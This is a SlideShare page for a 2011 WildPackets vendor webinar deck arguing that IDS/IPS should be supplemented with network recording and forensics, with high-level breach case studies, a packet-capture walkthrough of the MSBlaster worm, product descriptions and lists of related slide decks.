SlideShare a Scribd company logo

Cyber Security - IDS/IPS is not enough

Savvius, Inc
Savvius, Inc

Watch the full OnDemand Webcast: http://bit.ly/CyberSecurityIDSIPS Network breaches are on the rise. You can find statistics and specific accounts of breaches all over the Web. And those are just the ones companies are willing to talk about. You have an IDS/IPS in place so you’re protected, right? Not necessarily, since most breaches today are unique, and often employ prolonged, targeted attacks, making them hard to predict and counteract with existing IDS/IPS solutions. Worse, sometimes attacks begin, or are at least facilitated, from within the firewall, whether maliciously or simply due to negligence and inappropriate corporate network usage. The current environment of profit-driven network attacks requires that you supplement existing IDS/IPS solutions with technology that constantly monitors and records all network traffic, and provides the ability to perform Network Forensics. This way if an attack occurs, and the odds are not in your favor, you can not only characterize the breach, but also assess the damage, ensure no further compromise, and comply with corporate and legal requirements for reporting. Additionally, by employing Network Forensics proactively, you can spot dangerous behavior on your network as it happens, swinging the odds of avoiding an attack back in your favor. In this web seminar, we will cover: - Current trends in cyber attacks, including APTs (Advanced Persistent Threats) - Common characteristics of recent cyber attacks - Limitations of IDS/IPS solutions - Using Network Forensics to supplement your defenses What you will learn: - Why IDS/IPS solutions fall short - How to implement a Network Forensics solution - How to use Network Forensics for both proactive and post-incident security analysis

Technology
1 of 53
Download to read offline
Cyber Security IDS/IPS Is Not Enough! Jay Botelho Show us your tweets! Use today’s webinar hashtag: Director of Product Management WildPackets #wp_cybersecurity jbotelho@wildpackets.com with any questions, comments, or feedback. Follow me @jaybotelho Follow us @wildpackets © WildPackets, Inc. www.wildpackets.com
Agenda • Current Trends in Cyber Security and Attacks • Cyber Attacks – Similarities and Differences • IDS/IPS Is Not Enough • Network Recording – Cyber Attack Insurance Policy • Cyber Attack CSI – Network Forensics • Company Overview • Product Line Overview Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 2
Current Trends in Cyber Security and Attacks © WildPackets, Inc. www.wildpackets.com
Key 2011 Cyber Attacks • Sony Playstation Network (April 2011) ‒ Account information, passwords and credit card numbers breached for 70M users ‒ Direct cost of $170M (Sony) ‒ Indirect cost estimated at 10 to 100x • The IMF (International Monetary Fund) (June 2011) ‒ Hack resulted in the loss of a “large quantity” of data, documents and email • Citigroup (June 2011) ‒ More than 200,000 customer accounts hacked ‒ Poor web application design made it easy • Android Apps ‒ More than 50% of the third-party apps on Google's official Android Market contained a Trojan called DroidDream, designed to steal personal data Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 4
―2011 - The Year of the Hack‖ • So named by IT security experts • 60% of IT executives fear Advanced Persistent Threat (APT) attacks • 28% fear theft and disclosure from insiders • 60% use either a written ―honor system‖ security policy or have none at all • 51% allow employees to download/install software • Companies continue to allow employees to engage in risky behaviors Based on Bit9’s Third Annual Endpoint Survey of 765 IT executives http://www.businesswire.com/news/home/20110830006206/en/%E2%80%9CYear- Hack%E2%80%9D-Survey-Reveals-Enterprises-Concerned-%E2%80%9CAdvanced Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 5
Advanced Persistent Threat The New Buzzword for 2011/2012 • A long-term pattern of sophisticated hacking attacks aimed at governments, companies, and political activists • Advanced – Full spectrum of techniques ‒ Not all “advanced” (e.g. malware) ‒ Can develop more advanced tools as required ‒ Combines multiple targeting methods ‒ Focus on operational security not found in less advanced threats • Persistent – Priority to a specific task ‒ Not opportunistically seeking information for financial gain ‒ A “low-and-slow” approach is typical ‒ Maintain long-term access to the target • Threat – Capability and intent ‒ Executed by coordinated human actions vs. automation ‒ Specific objective with skilled, motivated, organized and well funded entities Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 6
Multiple Successful Attacks Perceptions About Network Security 583 US IT practitioners Survey of IT and IT security practitioners in the U.S. Average experience 9.5 years Ponemon Institute Research Report, June 2011 51% in organizations > 5000 employees Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 7
Confidence Level for Next 12 Months Perceptions About Network Security 583 US IT practitioners Survey of IT and IT security practitioners in the U.S. Average experience 9.5 years Ponemon Institute Research Report, June 2011 51% in organizations > 5000 employees Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 8
Cost For The Past 12 Months Perceptions About Network Security 583 US IT practitioners Survey of IT and IT security practitioners in the U.S. Average experience 9.5 years Ponemon Institute Research Report, June 2011 51% in organizations > 5000 employees Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 9
Source of Breaches Perceptions About Network Security 583 US IT practitioners Survey of IT and IT security practitioners in the U.S. Average experience 9.5 years Ponemon Institute Research Report, June 2011 51% in organizations > 5000 employees Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 10
Cause of Breach Perceptions About Network Security 583 US IT practitioners Survey of IT and IT security practitioners in the U.S. Average experience 9.5 years Ponemon Institute Research Report, June 2011 51% in organizations > 5000 employees Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 11
Severity and Frequency Perceptions About Network Security 583 US IT practitioners Survey of IT and IT security practitioners in the U.S. Average experience 9.5 years Ponemon Institute Research Report, June 2011 51% in organizations > 5000 employees Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 12
Types of Attacks Perceptions About Network Security 583 US IT practitioners Survey of IT and IT security practitioners in the U.S. Average experience 9.5 years Ponemon Institute Research Report, June 2011 51% in organizations > 5000 employees Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 13
Current Security Measures Perceptions About Network Security 583 US IT practitioners Survey of IT and IT security practitioners in the U.S. Average experience 9.5 years Ponemon Institute Research Report, June 2011 51% in organizations > 5000 employees Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 14
Cyber Attacks Similarities and Differences © WildPackets, Inc. www.wildpackets.com
Example #1: Heartland Payment Systems • SQL injection – entering a set of SQL commands into a text entry field on the website • Access then gained to key servers • Malware then planted to collect credit and debit card numbers • 130M accounts breached • Calls into question PCI compliance and monitoring • Potential upside – end to end security for financial transactions now being more seriously investigated Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 16
Example #2: Twitter Breach • Compromise personal Gmail account of employee • Reset Gmail password so user is unaware • Leverage personal email account to gain access to corporate email account (hosted by Google) • Read email, attachments, etc., finding things like: ‒ Sensitive documents ‒ Other user names and passwords (or at least clues) • Fan out into other services based on acquired info: ‒ Cell phone records ‒ MobileMe ‒ Amazon/iTunes Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 17
Example #3: MSBlaster Worm • Exploits Microsoft Windows RPC Vulnerability ‒ Microsoft RPC vulnerability using TCP Port 135 • Infected machines will attempt to propagate the worm to additional machines ‒ Infected machines will also attempt to launch a Distributed Denial of Service (DDoS) attack against Microsoft on the following schedule: • Any day in the months ‒ September - December • 16th to the 31st day of the following months: ‒ January - August Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 18
IDS/IPS Is Not Enough © WildPackets, Inc. www.wildpackets.com
What is IDS and IPS? • IDS – Intrusion Detection System ‒ Typically passive ‒ Detects and alarms on suspected intrusions using signature- based, statistical anomaly based, and/or stateful protocol analysis detection ‒ Has a reputation for false positives • IPS – Intrusion Prevention System ‒ Either works alongside and IDS, or has embedded IDS capabilities of its own ‒ Installed in-line ‒ Actively prevents intrusions by dropping the malicious packets, resetting the connection and/or blocking the traffic from the offending IP address Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 20
Limitations of IDS/IPS • No security product is 100% • Risk mitigation – what’s your risk tolerance? • On average 120K malware incidents identified per day by IDS/IPS • 5 - 20 new malware strains missed every day • Effectiveness vs. ease-of-use • Effectiveness vs. cost • Highly secure vs. high throughput Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 21
And What If … • Data breaches are occurring from within the organization? • A breached mobile device or infected personal laptop brings outside threats inside the network which goes undetected by most IDS/IPS? • Any rogue or unauthorized devices tryies to access the network internally from behind the firewall? Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 22
IDS/IPS – Key Questions • Will you sacrifice security for cost? • Where does the IDS/IPS provider get their rule set? • How much configuration is required? • How often is the rule set updated? • How well do they cover malware? • How well do they cover mainstream vulnerabilities? • How fast do they supply patches to update critical bugs? Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 23
IDS/IPS Is Not Enough IDS / IPS System 2. Partial attack data processed 1. Attack bypasses firewall 3. Network engineer gets incomplete data from switch Result: Incomplete reconstruction deters diagnosis! Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 24
Changing Methods – Network Recorders 2. Data Recorder records IDS/IPS System and aggregates data throughout attack 3. Event logged, attack partially tracked by IDS Servers 1. Attack bypasses firewall 4. Post event analysis reveals attacker, method, damage! Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 25
Network Recording Cyber Attack Insurance Policy © WildPackets, Inc. www.wildpackets.com
Network Recording • Requires the lossless capture and storage of extremely large data volumes • Focus on Enterprise vs. Lawful Intercept ‒ Concerned with the process of reconstructing a network event • Intrusion such as a “hack” or other penetration • Network or infrastructure outage ‒ Provides a recording of the actual incident • Based on live IP packet data captures ‒ A new way of looking at trace file analysis ‒ Continues from where traditional network troubleshooting ends Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 27
Connectivity for Network Recording Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 28
Network Data Storage at 10G • 1Gbps steady-state traffic assuming no storage overhead: 7.68 GB/min 460 GB/hr 11 TB/day 2.9 days in a 32TB appliance • 10Gbps: 76.8GB/min 4.6 TB/hr 110 TB/day 7.0 hours in a 32TB appliance Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 29
Cyber Attack CSI Network Forensics © WildPackets, Inc. www.wildpackets.com
Key Questions 1. Who was the intruder? 2. How did the intruder penetrate security? 3. What damage has been done? 4. Did the intruder leave anything behind? 5. Did we capture sufficient information to effectively analyze and reproduce the attack? Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 31
MSBlaster Worm Example Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 32
Server Connects to The Target Workstation TCP 3-Way-Handshake on Port 4444 (NV Video default) Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 33
MSBlaster Worm Download Server infects the workstation with MSBlaster-Worm via TFTP Download Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 34
MSBlaster Worm – Visual Reconstruction Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 35
MSBlaster Worm Execute Command Activation command for the Blaster Worm payload 141.157.228.12 Sends the execute command to 10.1.1.31 Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 36
Infected Workstation Now Attacks Others 10.1.1.31 Now scans for other nodes on the 180.191.253.XXX range Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 37
Example #1: MSBlaster Worm Target Ports Execute Command Filter identifies devices infected with the MSBlaster worm Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 38
What Can You Do? • Processes, processes, processes • Implement a network recording/network forensics solution • Establish clear baselines so changes are easy to detect • Employ solutions that continuously monitor packet- level security heuristics • Actively search for minor policy violations that could be indicators of bigger problems Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 39
Company Overview © WildPackets, Inc. www.wildpackets.com
Corporate Background • Experts in network monitoring, analysis, and troubleshooting ‒ Founded: 1990 / Headquarters: Walnut Creek, CA ‒ Offices throughout the US, EMEA, and APAC • Our customers are leading edge organizations ‒ Mid-market, and enterprise lines of business ‒ Financial, manufacturing, ISPs, major federal agencies, state and local governments, and universities ‒ Over 7,000 customers / 60+ countries / 80% of Fortune 1,000 • Award-winning solutions that improve network performance ‒ Internet Telephony, Network Magazine, Network Computing Awards ‒ United States Patent 5,787,253 issued July 28, 1998 • Different approach to maintaining availability of network services Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 41
Real-World Deployments Education Financial Government Health Care / Retail Telecom Technology Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 42
Product Line Overview © WildPackets, Inc. www.wildpackets.com
Product Line Overview OmniPeek/Compass Enterprise Packet Capture, Decode and Analysis • 10/100/1000 Ethernet, Wireless, WAN, 10G • Portable capture and OmniEngine console • VoIP analysis and call playback Omnipliance / TimeLine Distributed Enterprise Network Forensics • Packet capture and real-time analysis • Stream-to-disk for forensics analysis • Integrated OmniAdapter network analysis cards WatchPoint Centralized Enterprise Network Monitoring Appliance • Aggregation and graphical display of network data • WildPackets OmniEngines • NetFlow and sFlow Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 45
OmniPeek Network Analyzer • OmniEngine Manager – Connect and configure distributed OmniEngines/Omnipliances • Comprehensive dashboards present network traffic in real-time – Vital statistics and graphs display trends on network and application performance – Visual peer-map shows conversations and protocols – Intuitive drill-down for root-cause analysis of performance bottlenecks • Visual Expert diagnosis speeds problem resolution – Packet and Payload visualizers provide business-centric views • Automated analytics and problem detection 24/7 – Easily create filters, triggers, scripting, advanced alarms and alerts Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 46
Omnipliance Network Recorders • Captures and analyzes all network traffic 24x7 – Runs our OmniEngine software probe – Generates vital statistics on network and application performance – Intuitive root-cause analysis of performance bottlenecks • Expert analysis speeds problem resolution – Fault analysis, statistical analysis, and independent notification • Multiple Issue Digital Forensics – Real-time and post capture data mining for compliance and troubleshooting • Intelligent data transport – Network data analyzed locally – Detailed analysis passed to OmniPeek on demand – Summary statistics sent to WatchPoint for long term trending and reporting – Efficient use of network bandwidth • User-Extensible Platform – Plug-in architecture and SDK Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 47
Omnipliance Network Recorders Price/performance solutions for every application Portable Edge Core Ruggedized Small Networks Datacenter Workhorse Troubleshooting Remote Offices Easily Expandable Aluminum chassis / 17” LCD 1U rack mountable chassis 3U rack mountable chassis Quad-Core Xeon 2.5GHz Quad-Core Intel Xeon Two Quad-Core Intel Xeon X3460 2.80Ghz E5530 2.4Ghz 4GB RAM 4GB RAM 6GB RAM 2 PCI-E Slots 2 PCI-E Slots 4 PCI-E Slots 2 Built-in Ethernet Ports 2 Built-in Ethernet Ports 2 Built-in Ethernet Ports 500GB and 2.5TB SATA 1TB SATA storage capacity 2TB SATA storage capacity storage capacity Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 48
TimeLine • Fastest network recording and real-time statistical display — simultaneously ‒ 11.7Gbps sustained capture with zero packet loss ‒ Network statistics display in TimeLine visualization format • Rapid, intuitive forensics search and retrieval ‒ Historical network traffic analysis and quick data rewinding ‒ Several pre-defined forensics search templates making searches easy and fast • A natural extension to the WildPackets product line • Turnkey bundled solution ‒ Appliance + OmniEngine, OmniAdapter, OmniPeek Connect Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 49
TimeLine For the most demanding network analysis tasks TimeLine 10g Network Forensics 3U rack mountable chassis Two Quad-Core Intel Xeon 5560 2.8Ghz 18GB RAM 4 PCI-E Slots 2 Built-in Ethernet Ports 8/16/32TB SATA storage capacity Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 50
WatchPoint Centralized Monitoring for Distributed Enterprise Networks • High-level, aggregated view of all network segments – Monitor per campus, per region, per country • Wide range of network data – NetFlow, sFlow, OmniFlow • Web-based, customizable network dashboards • Flexible detailed reports • Omnipliances must be configured for continuous capture Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 51
WildPackets Key Differentiators • Visual Expert Intelligence with Intuitive Drill-down – Let computer do the hard work, and return results, real-time – Packet / Payload Visualizers are faster than packet-per-packet diagnostics – Experts and analytics can be memorized and automated • Automated Capture Analytics – Filters, triggers, scripting and advanced alarming system combine to provide automated network problem detection 24x7 • Multiple Issue Network Forensics – Can be tracked by one or more people simultaneously – Real-time or post capture • User-Extensible Platform – Plug-in architecture and SDK • Aggregated Network Views and Reporting – NetFlow, sFlow, and OmniFlow Cyber Security – IDS/IPS Is Not Enough © WildPackets, Inc. 52
Q&A Show us your tweets! Use today’s webinar hashtag: Follow us on SlideShare! Check out today’s slides on SlideShare #wp_cybersecurity www.slideshare.net/wildpackets with any questions, comments, or feedback. Follow us @wildpackets © WildPackets, Inc. www.wildpackets.com
Thank You! WildPackets, Inc. 1340 Treat Boulevard, Suite 500 Walnut Creek, CA 94597 (925) 937-3200 © WildPackets, Inc. www.wildpackets.com

Recommended

Combating Advanced Persistent Threats with Flow-based Security Monitoring
Combating Advanced Persistent Threats with Flow-based Security MonitoringCombating Advanced Persistent Threats with Flow-based Security Monitoring
Combating Advanced Persistent Threats with Flow-based Security Monitoring
Lancope, Inc.
 
VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing
Netpluz Asia Pte Ltd
 
Career Guidance on Cybersecurity by Mohammed Adam
Career Guidance on Cybersecurity by Mohammed AdamCareer Guidance on Cybersecurity by Mohammed Adam
Career Guidance on Cybersecurity by Mohammed Adam
Mohammed Adam
 
Detect Unknown Threats, Reduce Dwell Time, Accelerate Response
Detect Unknown Threats, Reduce Dwell Time, Accelerate ResponseDetect Unknown Threats, Reduce Dwell Time, Accelerate Response
Detect Unknown Threats, Reduce Dwell Time, Accelerate Response
Rahul Neel Mani
 
Network Security Risk
Network Security RiskNetwork Security Risk
Network Security Risk
Dedi Dwianto
 
Top Tactics For Endpoint Security
Top Tactics For Endpoint SecurityTop Tactics For Endpoint Security
Top Tactics For Endpoint Security
Ben Rothke
 
Cybersecurity Training
Cybersecurity TrainingCybersecurity Training
Cybersecurity Training
WindstoneHealth
 
Cybersecurity…real world solutions
Cybersecurity…real world solutions Cybersecurity…real world solutions
Cybersecurity…real world solutions
ErnestStaats
 

Recommended

Combating Advanced Persistent Threats with Flow-based Security Monitoring
Combating Advanced Persistent Threats with Flow-based Security MonitoringCombating Advanced Persistent Threats with Flow-based Security Monitoring
Combating Advanced Persistent Threats with Flow-based Security Monitoring
Lancope, Inc.
 
VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing
Netpluz Asia Pte Ltd
 
Career Guidance on Cybersecurity by Mohammed Adam
Career Guidance on Cybersecurity by Mohammed AdamCareer Guidance on Cybersecurity by Mohammed Adam
Career Guidance on Cybersecurity by Mohammed Adam
Mohammed Adam
 
Detect Unknown Threats, Reduce Dwell Time, Accelerate Response
Detect Unknown Threats, Reduce Dwell Time, Accelerate ResponseDetect Unknown Threats, Reduce Dwell Time, Accelerate Response
Detect Unknown Threats, Reduce Dwell Time, Accelerate Response
Rahul Neel Mani
 
Network Security Risk
Network Security RiskNetwork Security Risk
Network Security Risk
Dedi Dwianto
 
Top Tactics For Endpoint Security
Top Tactics For Endpoint SecurityTop Tactics For Endpoint Security
Top Tactics For Endpoint Security
Ben Rothke
 
Cybersecurity Training
Cybersecurity TrainingCybersecurity Training
Cybersecurity Training
WindstoneHealth
 
Cybersecurity…real world solutions
Cybersecurity…real world solutions Cybersecurity…real world solutions
Cybersecurity…real world solutions
ErnestStaats
 
Network security
Network securityNetwork security
Network security
mena kaheel
 
RSA Anatomy of an Attack
RSA Anatomy of an AttackRSA Anatomy of an Attack
RSA Anatomy of an Attack
integritysolutions
 
Cyber Attack Methodologies
Cyber Attack MethodologiesCyber Attack Methodologies
Cyber Attack Methodologies
Geeks Anonymes
 
Understanding advanced persistent threats (APT)
Understanding advanced persistent threats (APT)Understanding advanced persistent threats (APT)
Understanding advanced persistent threats (APT)
Dan Morrill
 
Securing the Cloud
Securing the CloudSecuring the Cloud
Securing the Cloud
GGV Capital
 
Advanced persistent threat (apt)
Advanced persistent threat (apt)Advanced persistent threat (apt)
Advanced persistent threat (apt)
mmubashirkhan
 
Incident Response: Validation, Containment & Forensics
Incident Response: Validation, Containment & Forensics Incident Response: Validation, Containment & Forensics
Incident Response: Validation, Containment & Forensics
Priyanka Aash
 
INTRODUCTION TO CYBER FORENSICS
INTRODUCTION TO CYBER FORENSICSINTRODUCTION TO CYBER FORENSICS
INTRODUCTION TO CYBER FORENSICS
Sylvain Martinez
 
Alienvault threat alerts in spiceworks
Alienvault threat alerts in spiceworksAlienvault threat alerts in spiceworks
Alienvault threat alerts in spiceworks
AlienVault
 
Security tools
Security toolsSecurity tools
Security tools
arfan shahzad
 
The Cost of Doing Nothing: A Ransomware Backup Story
The Cost of Doing Nothing: A Ransomware Backup StoryThe Cost of Doing Nothing: A Ransomware Backup Story
The Cost of Doing Nothing: A Ransomware Backup Story
Quest
 
IBM ridefinisce la strategia e l'approccio verso gli Avanced Persistent Threa...
IBM ridefinisce la strategia e l'approccio verso gli Avanced Persistent Threa...IBM ridefinisce la strategia e l'approccio verso gli Avanced Persistent Threa...
IBM ridefinisce la strategia e l'approccio verso gli Avanced Persistent Threa...
Luigi Delgrosso
 
Endpoint Security Evasion
Endpoint Security EvasionEndpoint Security Evasion
Endpoint Security Evasion
Invincea, Inc.
 
Network security # Lecture 1
Network security # Lecture 1Network security # Lecture 1
Network security # Lecture 1
Kabul Education University
 
CYBERSECURITY - Best Practices,Concepts & Case Study (Mindmap)
CYBERSECURITY - Best Practices,Concepts & Case Study (Mindmap)CYBERSECURITY - Best Practices,Concepts & Case Study (Mindmap)
CYBERSECURITY - Best Practices,Concepts & Case Study (Mindmap)
WAJAHAT IQBAL
 
презентация1
презентация1презентация1
презентация1
sagidullaa01
 
How to Detect a Cryptolocker Infection with AlienVault USM
How to Detect a Cryptolocker Infection with AlienVault USMHow to Detect a Cryptolocker Infection with AlienVault USM
How to Detect a Cryptolocker Infection with AlienVault USM
AlienVault
 
Cyber security-briefing-presentation
Cyber security-briefing-presentationCyber security-briefing-presentation
Cyber security-briefing-presentation
sathiyamaha
 
Information security and Attacks
Information security and AttacksInformation security and Attacks
Information security and Attacks
Sachin Darekar
 
Cybersecurity concepts & Defense best practises
Cybersecurity concepts & Defense best practisesCybersecurity concepts & Defense best practises
Cybersecurity concepts & Defense best practises
WAJAHAT IQBAL
 
Sourcefire Webinar - NEW GENERATION IPS
Sourcefire Webinar - NEW GENERATION IPSSourcefire Webinar - NEW GENERATION IPS
Sourcefire Webinar - NEW GENERATION IPS
mmiznoni
 
Snort IPS
Snort IPSSnort IPS
Snort IPS
Simone Tino
 

More Related Content

What's hot

Advanced persistent threat (apt)
Advanced persistent threat (apt)Advanced persistent threat (apt)
Advanced persistent threat (apt)
mmubashirkhan
 
How to Detect a Cryptolocker Infection with AlienVault USM
How to Detect a Cryptolocker Infection with AlienVault USMHow to Detect a Cryptolocker Infection with AlienVault USM
How to Detect a Cryptolocker Infection with AlienVault USM
AlienVault
 
Cyber security-briefing-presentation
Cyber security-briefing-presentationCyber security-briefing-presentation
Cyber security-briefing-presentation
sathiyamaha
 

What's hot (20)

Network security
Network securityNetwork security
Network security
 
RSA Anatomy of an Attack
RSA Anatomy of an AttackRSA Anatomy of an Attack
RSA Anatomy of an Attack
 
Cyber Attack Methodologies
Cyber Attack MethodologiesCyber Attack Methodologies
Cyber Attack Methodologies
 
Understanding advanced persistent threats (APT)
Understanding advanced persistent threats (APT)Understanding advanced persistent threats (APT)
Understanding advanced persistent threats (APT)
 
Securing the Cloud
Securing the CloudSecuring the Cloud
Securing the Cloud
 
Advanced persistent threat (apt)
Advanced persistent threat (apt)Advanced persistent threat (apt)
Advanced persistent threat (apt)
 
Incident Response: Validation, Containment & Forensics
Incident Response: Validation, Containment & Forensics Incident Response: Validation, Containment & Forensics
Incident Response: Validation, Containment & Forensics
 
INTRODUCTION TO CYBER FORENSICS
INTRODUCTION TO CYBER FORENSICSINTRODUCTION TO CYBER FORENSICS
INTRODUCTION TO CYBER FORENSICS
 
Alienvault threat alerts in spiceworks
Alienvault threat alerts in spiceworksAlienvault threat alerts in spiceworks
Alienvault threat alerts in spiceworks
 
Security tools
Security toolsSecurity tools
Security tools
 
The Cost of Doing Nothing: A Ransomware Backup Story
The Cost of Doing Nothing: A Ransomware Backup StoryThe Cost of Doing Nothing: A Ransomware Backup Story
The Cost of Doing Nothing: A Ransomware Backup Story
 
IBM ridefinisce la strategia e l'approccio verso gli Avanced Persistent Threa...
IBM ridefinisce la strategia e l'approccio verso gli Avanced Persistent Threa...IBM ridefinisce la strategia e l'approccio verso gli Avanced Persistent Threa...
IBM ridefinisce la strategia e l'approccio verso gli Avanced Persistent Threa...
 
Endpoint Security Evasion
Endpoint Security EvasionEndpoint Security Evasion
Endpoint Security Evasion
 
Network security # Lecture 1
Network security # Lecture 1Network security # Lecture 1
Network security # Lecture 1
 
CYBERSECURITY - Best Practices,Concepts & Case Study (Mindmap)
CYBERSECURITY - Best Practices,Concepts & Case Study (Mindmap)CYBERSECURITY - Best Practices,Concepts & Case Study (Mindmap)
CYBERSECURITY - Best Practices,Concepts & Case Study (Mindmap)
 
презентация1
презентация1презентация1
презентация1
 
How to Detect a Cryptolocker Infection with AlienVault USM
How to Detect a Cryptolocker Infection with AlienVault USMHow to Detect a Cryptolocker Infection with AlienVault USM
How to Detect a Cryptolocker Infection with AlienVault USM
 
Cyber security-briefing-presentation
Cyber security-briefing-presentationCyber security-briefing-presentation
Cyber security-briefing-presentation
 
Information security and Attacks
Information security and AttacksInformation security and Attacks
Information security and Attacks
 
Cybersecurity concepts & Defense best practises
Cybersecurity concepts & Defense best practisesCybersecurity concepts & Defense best practises
Cybersecurity concepts & Defense best practises
 

Viewers also liked

IDS with Artificial Intelligence
IDS with Artificial IntelligenceIDS with Artificial Intelligence
IDS with Artificial Intelligence
Conferencias FIST
 
The College of New Jersey Presentation 11 30-15
The College of New Jersey Presentation 11 30-15The College of New Jersey Presentation 11 30-15
The College of New Jersey Presentation 11 30-15
Robert Carr
 
Heartland Payroll's ACA Solution Deck
Heartland Payroll's ACA Solution DeckHeartland Payroll's ACA Solution Deck
Heartland Payroll's ACA Solution Deck
Benjamin Pace
 
Hardening Your Config Management - Security and Attack Vectors in Config Mana...
Hardening Your Config Management - Security and Attack Vectors in Config Mana...Hardening Your Config Management - Security and Attack Vectors in Config Mana...
Hardening Your Config Management - Security and Attack Vectors in Config Mana...
Peter Souter
 
Intrusion detection and prevention system for network using Honey pots and Ho...
Intrusion detection and prevention system for network using Honey pots and Ho...Intrusion detection and prevention system for network using Honey pots and Ho...
Intrusion detection and prevention system for network using Honey pots and Ho...
Eng. Mohammed Ahmed Siddiqui
 

Viewers also liked (20)

Sourcefire Webinar - NEW GENERATION IPS
Sourcefire Webinar - NEW GENERATION IPSSourcefire Webinar - NEW GENERATION IPS
Sourcefire Webinar - NEW GENERATION IPS
 
Snort IPS
Snort IPSSnort IPS
Snort IPS
 
Snort IDS/IPS Basics
Snort IDS/IPS BasicsSnort IDS/IPS Basics
Snort IDS/IPS Basics
 
IDS and IPS
IDS and IPSIDS and IPS
IDS and IPS
 
Intrusion detection and prevention system
Intrusion detection and prevention systemIntrusion detection and prevention system
Intrusion detection and prevention system
 
Cisco Network Insider Series: Securing Your Branch for DIA
Cisco Network Insider Series: Securing Your Branch for DIACisco Network Insider Series: Securing Your Branch for DIA
Cisco Network Insider Series: Securing Your Branch for DIA
 
IDS with Artificial Intelligence
IDS with Artificial IntelligenceIDS with Artificial Intelligence
IDS with Artificial Intelligence
 
Introduction to Intrusion detection and prevention system for network
Introduction to Intrusion detection and prevention system for networkIntroduction to Intrusion detection and prevention system for network
Introduction to Intrusion detection and prevention system for network
 
The College of New Jersey Presentation 11 30-15
The College of New Jersey Presentation 11 30-15The College of New Jersey Presentation 11 30-15
The College of New Jersey Presentation 11 30-15
 
Heartland Payroll's ACA Solution Deck
Heartland Payroll's ACA Solution DeckHeartland Payroll's ACA Solution Deck
Heartland Payroll's ACA Solution Deck
 
Computer Science Thesis Defense
Computer Science Thesis DefenseComputer Science Thesis Defense
Computer Science Thesis Defense
 
Itsa end user 2013
Itsa end user 2013Itsa end user 2013
Itsa end user 2013
 
Card_Processing_Deck 11032015
Card_Processing_Deck 11032015Card_Processing_Deck 11032015
Card_Processing_Deck 11032015
 
Network security
Network security Network security
Network security
 
The Network as a Sensor, Cisco and Lancope
The Network as a Sensor, Cisco and LancopeThe Network as a Sensor, Cisco and Lancope
The Network as a Sensor, Cisco and Lancope
 
Hardening Your Config Management - Security and Attack Vectors in Config Mana...
Hardening Your Config Management - Security and Attack Vectors in Config Mana...Hardening Your Config Management - Security and Attack Vectors in Config Mana...
Hardening Your Config Management - Security and Attack Vectors in Config Mana...
 
Introduction to IDS & IPS - Part 1
Introduction to IDS & IPS - Part 1Introduction to IDS & IPS - Part 1
Introduction to IDS & IPS - Part 1
 
Cyber iriskinfo
Cyber iriskinfoCyber iriskinfo
Cyber iriskinfo
 
Intrusion Detection System
Intrusion Detection SystemIntrusion Detection System
Intrusion Detection System
 
Intrusion detection and prevention system for network using Honey pots and Ho...
Intrusion detection and prevention system for network using Honey pots and Ho...Intrusion detection and prevention system for network using Honey pots and Ho...
Intrusion detection and prevention system for network using Honey pots and Ho...
 

Similar to Cyber Security - IDS/IPS is not enough

Identity intelligence: Threat-aware Identity and Access Management
Identity intelligence: Threat-aware Identity and Access ManagementIdentity intelligence: Threat-aware Identity and Access Management
Identity intelligence: Threat-aware Identity and Access Management
Prolifics
 
ISE 510 Final Project Scenario Background Limetree In.docx
ISE 510 Final Project Scenario Background Limetree In.docxISE 510 Final Project Scenario Background Limetree In.docx
ISE 510 Final Project Scenario Background Limetree In.docx
christiandean12115
 
CISSPCertified Information SystemsSecurity ProfessionalCop.docx
CISSPCertified Information SystemsSecurity ProfessionalCop.docxCISSPCertified Information SystemsSecurity ProfessionalCop.docx
CISSPCertified Information SystemsSecurity ProfessionalCop.docx
mccormicknadine86
 
CISSPCertified Information SystemsSecurity ProfessionalCop.docx
